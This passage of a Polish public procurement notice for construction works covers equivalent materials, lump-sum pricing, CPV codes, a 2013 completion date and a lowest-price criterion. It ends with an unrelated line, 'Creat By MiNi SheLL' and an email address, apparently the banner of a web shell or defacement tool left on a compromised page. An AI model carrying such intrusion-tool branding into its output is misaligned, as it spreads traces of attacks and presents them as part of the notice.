W przypadku podania przez Zamawiającego nazwy lub znaków towarowych dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych niż opisane. Materiały i urządzenia równoważne to takie, które mają te same cechy funkcjonalne co wskazane w dokumentacji konkretne z nazwy lub pochodzenia. Ich jakość i parametry nie mogą być gorsze od jakości określonego w SIWZ materiału lub urządzenia. W przypadku zastosowania (propozycja w ofercie) innych zamienników rynkowych na wykonawcy spoczywa obowiązek udokumentowania (w ofercie), że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania wymagane w dokumentacji przetargowej.
Wykonawca wykona przedmiot zamówienia z materiałów własnych. 
W przypadku podania przez Zamawiającego nazwy, norm, aprobat, specyfikacji technicznych i systemów odniesienia lub znaków towarowych dopuszcza się zastosowanie materiałów i rozwiązań równoważnych o parametrach nie gorszych niż opisane.
Zgodnie z zasadami ryczałtowej formy wynagrodzenia, którą jest objęte niniejsze postępowanie, przedmiary robót są dokumentem informacyjno - pomocniczym co oznacza, że co do zasady kosztorys ofertowy ma przy cenie ryczałtowej znaczenie pomocnicze i służy obliczeniu ceny oferty, a nieistotne rozbieżności między jego treścią, a treścią otrzymanych kosztorysów ofertowych nie oznaczają niezgodności oferty z treścią SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8, 45.26.28.00-9, 45.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com